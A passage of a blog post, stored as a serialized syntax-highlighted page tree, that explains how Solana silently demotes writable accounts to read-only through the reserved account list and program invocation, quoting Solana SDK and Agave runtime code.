can_transfer_lamports",{"type":28,"tag":116,"props":73619,"children":73620},{"style":266},[73621],{"type":33,"value":313},{"type":28,"tag":116,"props":73623,"children":73624},{"style":272},[73625],{"type":33,"value":12619},{"type":28,"tag":116,"props":73627,"children":73628},{"style":370},[73629],{"type":33,"value":4160},{"type":28,"tag":116,"props":73631,"children":73632},{"style":370},[73633],{"type":33,"value":6813},{"type":28,"tag":116,"props":73635,"children":73636},{"style":339},[73637],{"type":33,"value":14602},{"type":28,"tag":116,"props":73639,"children":73640},{"style":266},[73641],{"type":33,"value":825},{"type":28,"tag":116,"props":73643,"children":73644},{"style":272},[73645],{"type":33,"value":15174},{"type":28,"tag":116,"props":73647,"children":73648},{"style":370},[73649],{"type":33,"value":4160},{"type":28,"tag":116,"props":73651,"children":73652},{"style":339},[73653],{"type":33,"value":5531},{"type":28,"tag":116,"props":73655,"children":73656},{"style":266},[73657],{"type":33,"value":1609},{"type":28,"tag":116,"props":73659,"children":73660},{"style":370},[73661],{"type":33,"value":13423},{"type":28,"tag":116,"props":73663,"children":73664},{"style":339},[73665],{"type":33,"value":13428},{"type":28,"tag":116,"props":73667,"children":73668},{"style":266},[73669],{"type":33,"value":514},{"type":28,"tag":116,"props":73671,"children":73672},{"style":339},[73673],{"type":33,"value":29341},{"type":28,"tag":116,"props":73675,"children":73676},{"style":266},[73677],{"type":33,"value":6952},{"type":28,"tag":116,"props":73679,"children":73680},{"class":245,"line":256},[73681,73685,73690,73694,73698,73702,73706,73710,73714,73718,73722],{"type":28,"tag":116,"props":73682,"children":73683},{"style":376},[73684],{"type":33,"value":19930},{"type":28,"tag":116,"props":73686,"children":73687},{"style":282},[73688],{"type":33,"value":73689}," is_program",{"type":28,"tag":116,"props":73691,"children":73692},{"style":266},[73693],{"type":33,"value":313},{"type":28,"tag":116,"props":73695,"children":73696},{"style":272},[73697],{"type":33,"value":12619},{"type":28,"tag":116,"props":73699,"children":73700},{"style":370},[73701],{"type":33,"value":4160},{"type":28,"tag":116,"props":73703,"children":73704},{"style":370},[73705],{"type":33,"value":6813},{"type":28,"tag":116,"props":73707,"children":73708},{"style":339},[73709],{"type":33,"value":14602},{"type":28,"tag":116,"props":73711,"children":73712},{"style":266},[73713],{"type":33,"value":1609},{"type":28,"tag":116,"props":73715,"children":73716},{"style":370},[73717],{"type":33,"value":13423},{"type":28,"tag":116,"props":73719,"children":73720},{"style":339},[73721],{"type":33,"value":11718},{"type":28,"tag":116,"props":73723,"children":73724},{"style":266},[73725],{"type":33,"value":1291},{"type":28,"tag":116,"props":73727,"children":73728},{"class":245,"line":293},[73729,73733,73737],{"type":28,"tag":116,"props":73730,"children":73731},{"style":272},[73732],{"type":33,"value":24826},{"type":28,"tag":116,"props":73734,"children":73735},{"style":370},[73736],{"type":33,"value":141},{"type":28,"tag":116,"props":73738,"children":73739},{"style":266},[73740],{"type":33,"value":73741},"executable\n",{"type":28,"tag":116,"props":73743,"children":73744},{"class":245,"line":361},[73745],{"type":28,"tag":116,"props":73746,"children":73747},{"style":266},[73748],{"type":33,"value":406},{"type":28,"tag":116,"props":73750,"children":73751},{"class":245,"line":387},[73752,73756,73760,73764,73768,73772,73776,73780,73784],{"type":28,"tag":116,"props":73753,"children":73754},{"style":376},[73755],{"type":33,"value":11455},{"type":28,"tag":116,"props":73757,"children":73758},{"style":272},[73759],{"type":33,"value":72509},{"type":28,"tag":116,"props":73761,"children":73762},{"style":370},[73763],{"type":33,"value":2226},{"type":28,"tag":116,"props":73765,"children":73766},{"style":339},[73767],{"type":33,"value":43093},{"type":28,"tag":116,"props":73769,"children":73770},{"style":370},[73771],{"type":33,"value":3151},{"type":28,"tag":116,"props":73773,"children":73774},{"style":282},[73775],{"type":33,"value":16013},{"type":28,"tag":116,"props":73777,"children":73778},{"style":266},[73779],{"type":33,"value":13545},{"type":28,"tag":116,"props":73781,"children":73782},{"style":370},[73783],{"type":33,"value":2825},{"type":28,"tag":116,"props":73785,"children":73786},{"style":266},[73787],{"type":33,"value":384},{"type":28,"tag":116,"props":73789,"children":73790},{"class":245,"line":400},[73791,73795,73800,73804,73808,73812,73816,73820,73824,73828],{"type":28,"tag":116,"props":73792,"children":73793},{"style":376},[73794],{"type":33,"value":11455},{"type":28,"tag":116,"props":73796,"children":73797},{"style":272},[73798],{"type":33,"value":73799}," balance_after",{"type":28,"tag":116,"props":73801,"children":73802},{"style":370},[73803],{"type":33,"value":2226},{"type":28,"tag":116,"props":73805,"children":73806},{"style":272},[73807],{"type":33,"value":5153},{"type":28,"tag":116,"props":73809,"children":73810},{"style":370},[73811],{"type":33,"value":141},{"type":28,"tag":116,"props":73813,"children":73814},{"style":282},[73815],{"type":33,"value":15174},{"type":28,"tag":116,"props":73817,"children":73818},{"style":266},[73819],{"type":33,"value":13709},{"type":28,"tag":116,"props":73821,"children":73822},{"style":370},[73823],{"type":33,"value":2268},{"type":28,"tag":116,"props":73825,"children":73826},{"style":272},[73827],{"type":33,"value":72820},{"type":28,"tag":116,"props":73829,"children":73830},{"style":266},[73831],{"type":33,"value":384},{"type":28,"tag":116,"props":73833,"children":73834},{"class":245,"line":614},[73835,73839,73843,73847,73851],{"type":28,"tag":116,"props":73836,"children":73837},{"style":339},[73838],{"type":33,"value":20153},{"type":28,"tag":116,"props":73840,"children":73841},{"style":266},[73842],{"type":33,"value":313},{"type":28,"tag":116,"props":73844,"children":73845},{"style":272},[73846],{"type":33,"value":12619},{"type":28,"tag":116,"props":73848,"children":73849},{"style":370},[73850],{"type":33,"value":141},{"type":28,"tag":116,"props":73852,"children":73853},{"style":266},[73854],{"type":33,"value":73855},"is_writable\n",{"type":28,"tag":116,"props":73857,"children":73858},{"class":245,"line":631},[73859,73863,73867,73871,73876,73880,73885,73889,73893,73897,73901],{"type":28,"tag":116,"props":73860,"children":73861},{"style":370},[73862],{"type":33,"value":15283},{"type":28,"tag":116,"props":73864,"children":73865},{"style":272},[73866],{"type":33,"value":72509},{"type":28,"tag":116,"props":73868,"children":73869},{"style":370},[73870],{"type":33,"value":141},{"type":28,"tag":116,"props":73872,"children":73873},{"style":282},[73874],{"type":33,"value":73875},"is_exempt",{"type":28,"tag":116,"props":73877,"children":73878},{"style":266},[73879],{"type":33,"value":313},{"type":28,"tag":116,"props":73881,"children":73882},{"style":272},[73883],{"type":33,"value":73884},"balance_after",{"type":28,"tag":116,"props":73886,"children":73887},{"style":266},[73888],{"type":33,"value":825},{"type":28,"tag":116,"props":73890,"children":73891},{"style":272},[73892],{"type":33,"value":12619},{"type":28,"tag":116,"props":73894,"children":73895},{"style":370},[73896],{"type":33,"value":141},{"type":28,"tag":116,"props":73898,"children":73899},{"style":282},[73900],{"type":33,"value":13472},{"type":28,"tag":116,"props":73902,"children":73903},{"style":266},[73904],{"type":33,"value":15322},{"type":28,"tag":116,"props":73906,"children":73907},{"class":245,"line":665},[73908,73912,73916,73921,73925,73929],{"type":28,"tag":116,"props":73909,"children":73910},{"style":370},[73911],{"type":33,"value":15283},{"type":28,"tag":116,"props":73913,"children":73914},{"style":370},[73915],{"type":33,"value":12530},{"type":28,"tag":116,"props":73917,"children":73918},{"style":282},[73919],{"type":33,"value":73920},"is_program",{"type":28,"tag":116,"props":73922,"children":73923},{"style":266},[73924],{"type":33,"value":313},{"type":28,"tag":116,"props":73926,"children":73927},{"style":272},[73928],{"type":33,"value":12619},{"type":28,"tag":116,"props":73930,"children":73931},{"style":266},[73932],{"type":33,"value":19376},{"type":28,"tag":116,"props":73934,"children":73935},{"class":245,"line":713},[73936],{"type":28,"tag":116,"props":73937,"children":73938},{"style":266},[73939],{"type":33,"value":406},{"type":28,"tag":29,"props":73941,"children":73942},{},[73943],{"type":33,"value":73944},"Now we’re safe...right?",{"type":28,"tag":75,"props":73946,"children":73948},{"id":73947},"bug-3-the-write-demotion-trap",[73949],{"type":33,"value":73950},"Bug 3: The Write-Demotion Trap",{"type":28,"tag":29,"props":73952,"children":73953},{},[73954,73956,73961,73963,73968],{"type":33,"value":73955},"On Solana, accounts passed as ",{"type":28,"tag":4995,"props":73957,"children":73958},{},[73959],{"type":33,"value":73960},"writable",{"type":33,"value":73962}," in a transaction can be ",{"type":28,"tag":4995,"props":73964,"children":73965},{},[73966],{"type":33,"value":73967},"silently downgraded to read-only",{"type":33,"value":73969},". This behavior occurs during message sanitization — even before your program runs.",{"type":28,"tag":29,"props":73971,"children":73972},{},[73973,73975,73982],{"type":33,"value":73974},"Let’s walk through the logic for legacy messages (note: the same rules apply to ",{"type":28,"tag":87,"props":73976,"children":73979},{"href":73977,"rel":73978},"https://github.com/anza-xyz/solana-sdk/blob/master/message/src/versions/v0/loaded.rs#L58-L98",[91],[73980],{"type":33,"value":73981},"MessageV0",{"type":33,"value":73983},", but legacy is simpler to follow):",{"type":28,"tag":234,"props":73985,"children":73987},{"className":2652,"code":73986,"language":2651,"meta":7,"style":7},"// https://github.com/anza-xyz/solana-sdk/blob/master/message/src/sanitized.rs#L39-L55\nimpl LegacyMessage\u003C'_> {\n    pub fn new(message: legacy::Message, reserved_account_keys: &HashSet\u003CPubkey>) -> Self {\n        let is_writable_account_cache = message\n            .account_keys\n            .iter()\n            .enumerate()\n            .map(|(i, _key)| {\n                message.is_writable_index(i)\n                    && !reserved_account_keys.contains(&message.account_keys[i])\n                    && !message.demote_program_id(i)\n            })\n            .collect::\u003CVec\u003C_>>();\n        Self {\n            message: Cow::Owned(message),\n            is_writable_account_cache,\n        }\n    }\n}\n\n// https://github.com/anza-xyz/solana-sdk/blob/master/message/src/legacy.rs#L642-L644\npub fn demote_program_id(&self, i: usize) -> bool {\n    self.is_key_called_as_program(i) && !self.is_upgradeable_loader_present()\n}\n\n",[73988],{"type":28,"tag":98,"props":73989,"children":73990},{"__ignoreMap":7},[73991,73999,74023,74111,74132,74144,74160,74176,74224,74253,74307,74343,74351,74388,74400,74438,74450,74457,74464,74471,74478,74486,74546,74599],{"type":28,"tag":116,"props":73992,"children":73993},{"class":245,"line":246},[73994],{"type":28,"tag":116,"props":73995,"children":73996},{"style":250},[73997],{"type":33,"value":73998},"// https://github.com/anza-xyz/solana-sdk/blob/master/message/src/sanitized.rs#L39-L55\n",{"type":28,"tag":116,"props":74000,"children":74001},{"class":245,"line":256},[74002,74006,74011,74015,74019],{"type":28,"tag":116,"props":74003,"children":74004},{"style":376},[74005],{"type":33,"value":27849},{"type":28,"tag":116,"props":74007,"children":74008},{"style":339},[74009],{"type":33,"value":74010}," LegacyMessage",{"type":28,"tag":116,"props":74012,"children":74013},{"style":266},[74014],{"type":33,"value":22585},{"type":28,"tag":116,"props":74016,"children":74017},{"style":339},[74018],{"type":33,"value":2754},{"type":28,"tag":116,"props":74020,"children":74021},{"style":266},[74022],{"type":33,"value":6952},{"type":28,"tag":116,"props":74024,"children":74025},{"class":245,"line":293},[74026,74030,74034,74038,74042,74046,74050,74055,74059,74064,74068,74073,74077,74081,74086,74090,74094,74098,74102,74107],{"type":28,"tag":116,"props":74027,"children":74028},{"style":376},[74029],{"type":33,"value":20506},{"type":28,"tag":116,"props":74031,"children":74032},{"style":376},[74033],{"type":33,"value":13361},{"type":28,"tag":116,"props":74035,"children":74036},{"style":282},[74037],{"type":33,"value":31582},{"type":28,"tag":116,"props":74039,"children":74040},{"style":266},[74041],{"type":33,"value":313},{"type":28,"tag":116,"props":74043,"children":74044},{"style":272},[74045],{"type":33,"value":67657},{"type":28,"tag":116,"props":74047,"children":74048},{"style":370},[74049],{"type":33,"value":4160},{"type":28,"tag":116,"props":74051,"children":74052},{"style":266},[74053],{"type":33,"value":74054}," legacy",{"type":28,"tag":116,"props":74056,"children":74057},{"style":370},[74058],{"type":33,"value":3151},{"type":28,"tag":116,"props":74060,"children":74061},{"style":339},[74062],{"type":33,"value":74063},"Message",{"type":28,"tag":116,"props":74065,"children":74066},{"style":266},[74067],{"type":33,"value":825},{"type":28,"tag":116,"props":74069,"children":74070},{"style":272},[74071],{"type":33,"value":74072},"reserved_account_keys",{"type":28,"tag":116,"props":74074,"children":74075},{"style":370},[74076],{"type":33,"value":4160},{"type":28,"tag":116,"props":74078,"children":74079},{"style":370},[74080],{"type":33,"value":6813},{"type":28,"tag":116,"props":74082,"children":74083},{"style":339},[74084],{"type":33,"value":74085},"HashSet",{"type":28,"tag":116,"props":74087,"children":74088},{"style":266},[74089],{"type":33,"value":514},{"type":28,"tag":116,"props":74091,"children":74092},{"style":339},[74093],{"type":33,"value":21061},{"type":28,"tag":116,"props":74095,"children":74096},{"style":266},[74097],{"type":33,"value":20110},{"type":28,"tag":116,"props":74099,"children":74100},{"style":370},[74101],{"type":33,"value":13423},{"type":28,"tag":116,"props":74103,"children":74104},{"style":376},[74105],{"type":33,"value":74106}," Self",{"type":28,"tag":116,"props":74108,"children":74109},{"style":266},[74110],{"type":33,"value":1291},{"type":28,"tag":116,"props":74112,"children":74113},{"class":245,"line":361},[74114,74118,74123,74127],{"type":28,"tag":116,"props":74115,"children":74116},{"style":376},[74117],{"type":33,"value":2736},{"type":28,"tag":116,"props":74119,"children":74120},{"style":272},[74121],{"type":33,"value":74122}," is_writable_account_cache",{"type":28,"tag":116,"props":74124,"children":74125},{"style":370},[74126],{"type":33,"value":2226},{"type":28,"tag":116,"props":74128,"children":74129},{"style":272},[74130],{"type":33,"value":74131}," message\n",{"type":28,"tag":116,"props":74133,"children":74134},{"class":245,"line":387},[74135,74139],{"type":28,"tag":116,"props":74136,"children":74137},{"style":370},[74138],{"type":33,"value":2838},{"type":28,"tag":116,"props":74140,"children":74141},{"style":266},[74142],{"type":33,"value":74143},"account_keys\n",{"type":28,"tag":116,"props":74145,"children":74146},{"class":245,"line":400},[74147,74151,74156],{"type":28,"tag":116,"props":74148,"children":74149},{"style":370},[74150],{"type":33,"value":2838},{"type":28,"tag":116,"props":74152,"children":74153},{"style":282},[74154],{"type":33,"value":74155},"iter",{"type":28,"tag":116,"props":74157,"children":74158},{"style":266},[74159],{"type":33,"value":7407},{"type":28,"tag":116,"props":74161,"children":74162},{"class":245,"line":614},[74163,74167,74172],{"type":28,"tag":116,"props":74164,"children":74165},{"style":370},[74166],{"type":33,"value":2838},{"type":28,"tag":116,"props":74168,"children":74169},{"style":282},[74170],{"type":33,"value":74171},"enumerate",{"type":28,"tag":116,"props":74173,"children":74174},{"style":266},[74175],{"type":33,"value":7407},{"type":28,"tag":116,"props":74177,"children":74178},{"class":245,"line":631},[74179,74183,74187,74191,74195,74199,74203,74207,74212,74216,74220],{"type":28,"tag":116,"props":74180,"children":74181},{"style":370},[74182],{"type":33,"value":2838},{"type":28,"tag":116,"props":74184,"children":74185},{"style":282},[74186],{"type":33,"value":66722},{"type":28,"tag":116,"props":74188,"children":74189},{"style":266},[74190],{"type":33,"value":313},{"type":28,"tag":116,"props":74192,"children":74193},{"style":370},[74194],{"type":33,"value":10083},{"type":28,"tag":116,"props":74196,"children":74197},{"style":266},[74198],{"type":33,"value":313},{"type":28,"tag":116,"props":74200,"children":74201},{"style":272},[74202],{"type":33,"value":3408},{"type":28,"tag":116,"props":74204,"children":74205},{"style":266},[74206],{"type":33,"value":825},{"type":28,"tag":116,"props":74208,"children":74209},{"style":272},[74210],{"type":33,"value":74211},"_key",{"type":28,"tag":116,"props":74213,"children":74214},{"style":266},[74215],{"type":33,"value":1829},{"type":28,"tag":116,"props":74217,"children":74218},{"style":370},[74219],{"type":33,"value":10083},{"type":28,"tag":116,"props":74221,"children":74222},{"style":266},[74223],{"type":33,"value":1291},{"type":28,"tag":116,"props":74225,"children":74226},{"class":245,"line":665},[74227,74232,74236,74241,74245,74249],{"type":28,"tag":116,"props":74228,"children":74229},{"style":272},[74230],{"type":33,"value":74231},"                message",{"type":28,"tag":116,"props":74233,"children":74234},{"style":370},[74235],{"type":33,"value":141},{"type":28,"tag":116,"props":74237,"children":74238},{"style":282},[74239],{"type":33,"value":74240},"is_writable_index",{"type":28,"tag":116,"props":74242,"children":74243},{"style":266},[74244],{"type":33,"value":313},{"type":28,"tag":116,"props":74246,"children":74247},{"style":272},[74248],{"type":33,"value":3408},{"type":28,"tag":116,"props":74250,"children":74251},{"style":266},[74252],{"type":33,"value":2830},{"type":28,"tag":116,"props":74254,"children":74255},{"class":245,"line":713},[74256,74261,74265,74269,74273,74278,74282,74286,74290,74294,74299,74303],{"type":28,"tag":116,"props":74257,"children":74258},{"style":370},[74259],{"type":33,"value":74260},"                    &&",{"type":28,"tag":116,"props":74262,"children":74263},{"style":370},[74264],{"type":33,"value":12530},{"type":28,"tag":116,"props":74266,"children":74267},{"style":272},[74268],{"type":33,"value":74072},{"type":28,"tag":116,"props":74270,"children":74271},{"style":370},[74272],{"type":33,"value":141},{"type":28,"tag":116,"props":74274,"children":74275},{"style":282},[74276],{"type":33,"value":74277},"contains",{"type":28,"tag":116,"props":74279,"children":74280},{"style":266},[74281],{"type":33,"value":313},{"type":28,"tag":116,"props":74283,"children":74284},{"style":370},[74285],{"type":33,"value":2780},{"type":28,"tag":116,"props":74287,"children":74288},{"style":272},[74289],{"type":33,"value":67657},{"type":28,"tag":116,"props":74291,"children":74292},{"style":370},[74293],{"type":33,"value":141},{"type":28,"tag":116,"props":74295,"children":74296},{"style":266},[74297],{"type":33,"value":74298},"account_keys[",{"type":28,"tag":116,"props":74300,"children":74301},{"style":272},[74302],{"type":33,"value":3408},{"type":28,"tag":116,"props":74304,"children":74305},{"style":266},[74306],{"type":33,"value":55059},{"type":28,"tag":116,"props":74308,"children":74309},{"class":245,"line":750},[74310,74314,74318,74322,74326,74331,74335,74339],{"type":28,"tag":116,"props":74311,"children":74312},{"style":370},[74313],{"type":33,"value":74260},{"type":28,"tag":116,"props":74315,"children":74316},{"style":370},[74317],{"type":33,"value":12530},{"type":28,"tag":116,"props":74319,"children":74320},{"style":272},[74321],{"type":33,"value":67657},{"type":28,"tag":116,"props":74323,"children":74324},{"style":370},[74325],{"type":33,"value":141},{"type":28,"tag":116,"props":74327,"children":74328},{"style":282},[74329],{"type":33,"value":74330},"demote_program_id",{"type":28,"tag":116,"props":74332,"children":74333},{"style":266},[74334],{"type":33,"value":313},{"type":28,"tag":116,"props":74336,"children":74337},{"style":272},[74338],{"type":33,"value":3408},{"type":28,"tag":116,"props":74340,"children":74341},{"style":266},[74342],{"type":33,"value":2830},{"type":28,"tag":116,"props":74344,"children":74345},{"class":245,"line":779},[74346],{"type":28,"tag":116,"props":74347,"children":74348},{"style":266},[74349],{"type":33,"value":74350},"            })\n",{"type":28,"tag":116,"props":74352,"children":74353},{"class":245,"line":796},[74354,74358,74363,74367,74371,74375,74379,74383],{"type":28,"tag":116,"props":74355,"children":74356},{"style":370},[74357],{"type":33,"value":2838},{"type":28,"tag":116,"props":74359,"children":74360},{"style":282},[74361],{"type":33,"value":74362},"collect",{"type":28,"tag":116,"props":74364,"children":74365},{"style":370},[74366],{"type":33,"value":3151},{"type":28,"tag":116,"props":74368,"children":74369},{"style":266},[74370],{"type":33,"value":514},{"type":28,"tag":116,"props":74372,"children":74373},{"style":339},[74374],{"type":33,"value":16872},{"type":28,"tag":116,"props":74376,"children":74377},{"style":266},[74378],{"type":33,"value":514},{"type":28,"tag":116,"props":74380,"children":74381},{"style":272},[74382],{"type":33,"value":2754},{"type":28,"tag":116,"props":74384,"children":74385},{"style":266},[74386],{"type":33,"value":74387},">>();\n",{"type":28,"tag":116,"props":74389,"children":74390},{"class":245,"line":847},[74391,74396],{"type":28,"tag":116,"props":74392,"children":74393},{"style":376},[74394],{"type":33,"value":74395},"        Self",{"type":28,"tag":116,"props":74397,"children":74398},{"style":266},[74399],{"type":33,"value":1291},{"type":28,"tag":116,"props":74401,"children":74402},{"class":245,"line":898},[74403,74408,74412,74417,74421,74426,74430,74434],{"type":28,"tag":116,"props":74404,"children":74405},{"style":272},[74406],{"type":33,"value":74407},"            message",{"type":28,"tag":116,"props":74409,"children":74410},{"style":370},[74411],{"type":33,"value":4160},{"type":28,"tag":116,"props":74413,"children":74414},{"style":339},[74415],{"type":33,"value":74416}," Cow",{"type":28,"tag":116,"props":74418,"children":74419},{"style":370},[74420],{"type":33,"value":3151},{"type":28,"tag":116,"props":74422,"children":74423},{"style":282},[74424],{"type":33,"value":74425},"Owned",{"type":28,"tag":116,"props":74427,"children":74428},{"style":266},[74429],{"type":33,"value":313},{"type":28,"tag":116,"props":74431,"children":74432},{"style":272},[74433],{"type":33,"value":67657},{"type":28,"tag":116,"props":74435,"children":74436},{"style":266},[74437],{"type":33,"value":6408},{"type":28,"tag":116,"props":74439,"children":74440},{"class":245,"line":907},[74441,74446],{"type":28,"tag":116,"props":74442,"children":74443},{"style":272},[74444],{"type":33,"value":74445},"            is_writable_account_cache",{"type":28,"tag":116,"props":74447,"children":74448},{"style":266},[74449],{"type":33,"value":3178},{"type":28,"tag":116,"props":74451,"children":74452},{"class":245,"line":981},[74453],{"type":28,"tag":116,"props":74454,"children":74455},{"style":266},[74456],{"type":33,"value":1954},{"type":28,"tag":116,"props":74458,"children":74459},{"class":245,"line":1011},[74460],{"type":28,"tag":116,"props":74461,"children":74462},{"style":266},[74463],{"type":33,"value":3025},{"type":28,"tag":116,"props":74465,"children":74466},{"class":245,"line":1029},[74467],{"type":28,"tag":116,"props":74468,"children":74469},{"style":266},[74470],{"type":33,"value":406},{"type":28,"tag":116,"props":74472,"children":74473},{"class":245,"line":1038},[74474],{"type":28,"tag":116,"props":74475,"children":74476},{"emptyLinePlaceholder":19},[74477],{"type":33,"value":1044},{"type":28,"tag":116,"props":74479,"children":74480},{"class":245,"line":1047},[74481],{"type":28,"tag":116,"props":74482,"children":74483},{"style":250},[74484],{"type":33,"value":74485},"// https://github.com/anza-xyz/solana-sdk/blob/master/message/src/legacy.rs#L642-L644\n",{"type":28,"tag":116,"props":74487,"children":74488},{"class":245,"line":1071},[74489,74493,74497,74502,74506,74510,74514,74518,74522,74526,74530,74534,74538,74542],{"type":28,"tag":116,"props":74490,"children":74491},{"style":376},[74492],{"type":33,"value":13356},{"type":28,"tag":116,"props":74494,"children":74495},{"style":376},[74496],{"type":33,"value":13361},{"type":28,"tag":116,"props":74498,"children":74499},{"style":282},[74500],{"type":33,"value":74501}," demote_program_id",{"type":28,"tag":116,"props":74503,"children":74504},{"style":266},[74505],{"type":33,"value":313},{"type":28,"tag":116,"props":74507,"children":74508},{"style":370},[74509],{"type":33,"value":2780},{"type":28,"tag":116,"props":74511,"children":74512},{"style":376},[74513],{"type":33,"value":13379},{"type":28,"tag":116,"props":74515,"children":74516},{"style":266},[74517],{"type":33,"value":825},{"type":28,"tag":116,"props":74519,"children":74520},{"style":272},[74521],{"type":33,"value":3408},{"type":28,"tag":116,"props":74523,"children":74524},{"style":370},[74525],{"type":33,"value":4160},{"type":28,"tag":116,"props":74527,"children":74528},{"style":339},[74529],{"type":33,"value":13397},{"type":28,"tag":116,"props":74531,"children":74532},{"style":266},[74533],{"type":33,"value":1609},{"type":28,"tag":116,"props":74535,"children":74536},{"style":370},[74537],{"type":33,"value":13423},{"type":28,"tag":116,"props":74539,"children":74540},{"style":339},[74541],{"type":33,"value":11718},{"type":28,"tag":116,"props":74543,"children":74544},{"style":266},[74545],{"type":33,"value":1291},{"type":28,"tag":116,"props":74547,"children":74548},{"class":245,"line":1137},[74549,74553,74557,74562,74566,74570,74574,74578,74582,74586,74590,74595],{"type":28,"tag":116,"props":74550,"children":74551},{"style":376},[74552],{"type":33,"value":20449},{"type":28,"tag":116,"props":74554,"children":74555},{"style":370},[74556],{"type":33,"value":141},{"type":28,"tag":116,"props":74558,"children":74559},{"style":282},[74560],{"type":33,"value":74561},"is_key_called_as_program",{"type":28,"tag":116,"props":74563,"children":74564},{"style":266},[74565],{"type":33,"value":313},{"type":28,"tag":116,"props":74567,"children":74568},{"style":272},[74569],{"type":33,"value":3408},{"type":28,"tag":116,"props":74571,"children":74572},{"style":266},[74573],{"type":33,"value":1609},{"type":28,"tag":116,"props":74575,"children":74576},{"style":370},[74577],{"type":33,"value":72815},{"type":28,"tag":116,"props":74579,"children":74580},{"style":370},[74581],{"type":33,"value":12530},{"type":28,"tag":116,"props":74583,"children":74584},{"style":376},[74585],{"type":33,"value":13379},{"type":28,"tag":116,"props":74587,"children":74588},{"style":370},[74589],{"type":33,"value":141},{"type":28,"tag":116,"props":74591,"children":74592},{"style":282},[74593],{"type":33,"value":74594},"is_upgradeable_loader_present",{"type":28,"tag":116,"props":74596,"children":74597},{"style":266},[74598],{"type":33,"value":7407},{"type":28,"tag":116,"props":74600,"children":74601},{"class":245,"line":1181},[74602],{"type":28,"tag":116,"props":74603,"children":74604},{"style":266},[74605],{"type":33,"value":406},{"type":28,"tag":29,"props":74607,"children":74608},{},[74609],{"type":33,"value":74610},"As you can see, there are two main causes of write-demotion:",{"type":28,"tag":455,"props":74612,"children":74613},{},[74614,74626],{"type":28,"tag":459,"props":74615,"children":74616},{},[74617,74619],{"type":33,"value":74618},"The account appears in the ",{"type":28,"tag":87,"props":74620,"children":74623},{"href":74621,"rel":74622},"https://github.com/anza-xyz/agave/blob/cd76bf6b8da8ec3739f0df4e087de0e50028b034/reserved-account-keys/src/lib.rs#L142-L182",[91],[74624],{"type":33,"value":74625},"reserved account list",{"type":28,"tag":459,"props":74627,"children":74628},{},[74629],{"type":33,"value":74630},"The account is invoked as a program without the upgradable loader being present in the transaction.",{"type":28,"tag":29,"props":74632,"children":74633},{},[74634],{"type":33,"value":74635},"The second case is generally covered by the executable check implemented previously.",{"type":28,"tag":29,"props":74637,"children":74638},{},[74639],{"type":33,"value":74640},"The first case, however, is far more dangerous — it can silently break your program logic without any obvious cause. Let’s dig deeper into that.",{"type":28,"tag":443,"props":74642,"children":74644},{"id":74643},"the-reserved-account-list",[74645],{"type":33,"value":74646},"The Reserved Account List",{"type":28,"tag":29,"props":74648,"children":74649},{},[74650,74652,74657],{"type":33,"value":74651},"The Solana runtime maintains a ",{"type":28,"tag":87,"props":74653,"children":74655},{"href":74621,"rel":74654},[91],[74656],{"type":33,"value":74625},{"type":33,"value":74658},", which includes addresses with special semantics — such as built-in programs, precompiles, and sysvars.",{"type":28,"tag":29,"props":74660,"children":74661},{},[74662,74664,74671,74673,74678],{"type":33,"value":74663},"These accounts may initially behave like normal accounts. However, once they become reserved after a ",{"type":28,"tag":87,"props":74665,"children":74668},{"href":74666,"rel":74667},"https://github.com/anza-xyz/agave/blob/0e6d9bf8c81cd94dfdedb500af4ac17328cf7a43/runtime/src/bank.rs#L6469-L6474",[91],[74669],{"type":33,"value":74670},"feature gate is actived",{"type":33,"value":74672},", the runtime will ",{"type":28,"tag":4995,"props":74674,"children":74675},{},[74676],{"type":33,"value":74677},"automatically demote them to read-only",{"type":33,"value":74679},", even if the transaction marked them as writable.",{"type":28,"tag":234,"props":74681,"children":74683},{"className":2652,"code":74682,"language":2651,"meta":7,"style":7},"// https://github.com/anza-xyz/agave/blob/0e6d9bf8c81cd94dfdedb500af4ac17328cf7a43/runtime/src/bank.rs#L6469-L6474\n// Update active set of reserved account keys which are not allowed to be write locked\nself.reserved_account_keys = {\n    let mut reserved_keys = ReservedAccountKeys::clone(&self.reserved_account_keys);\n    reserved_keys.update_active_set(&self.feature_set);\n    Arc::new(reserved_keys)\n};\n",[74684],{"type":28,"tag":98,"props":74685,"children":74686},{"__ignoreMap":7},[74687,74695,74703,74727,74781,74819,74848],{"type":28,"tag":116,"props":74688,"children":74689},{"class":245,"line":246},[74690],{"type":28,"tag":116,"props":74691,"children":74692},{"style":250},[74693],{"type":33,"value":74694},"// https://github.com/anza-xyz/agave/blob/0e6d9bf8c81cd94dfdedb500af4ac17328cf7a43/runtime/src/bank.rs#L6469-L6474\n",{"type":28,"tag":116,"props":74696,"children":74697},{"class":245,"line":256},[74698],{"type":28,"tag":116,"props":74699,"children":74700},{"style":250},[74701],{"type":33,"value":74702},"// Update active set of reserved account keys which are not allowed to be write locked\n",{"type":28,"tag":116,"props":74704,"children":74705},{"class":245,"line":293},[74706,74710,74714,74719,74723],{"type":28,"tag":116,"props":74707,"children":74708},{"style":376},[74709],{"type":33,"value":13379},{"type":28,"tag":116,"props":74711,"children":74712},{"style":370},[74713],{"type":33,"value":141},{"type":28,"tag":116,"props":74715,"children":74716},{"style":266},[74717],{"type":33,"value":74718},"reserved_account_keys ",{"type":28,"tag":116,"props":74720,"children":74721},{"style":370},[74722],{"type":33,"value":373},{"type":28,"tag":116,"props":74724,"children":74725},{"style":266},[74726],{"type":33,"value":1291},{"type":28,"tag":116,"props":74728,"children":74729},{"class":245,"line":361},[74730,74734,74738,74743,74747,74752,74756,74760,74764,74768,74772,74776],{"type":28,"tag":116,"props":74731,"children":74732},{"style":376},[74733],{"type":33,"value":2672},{"type":28,"tag":116,"props":74735,"children":74736},{"style":376},[74737],{"type":33,"value":2677},{"type":28,"tag":116,"props":74739,"children":74740},{"style":272},[74741],{"type":33,"value":74742}," reserved_keys",{"type":28,"tag":116,"props":74744,"children":74745},{"style":370},[74746],{"type":33,"value":2226},{"type":28,"tag":116,"props":74748,"children":74749},{"style":339},[74750],{"type":33,"value":74751}," 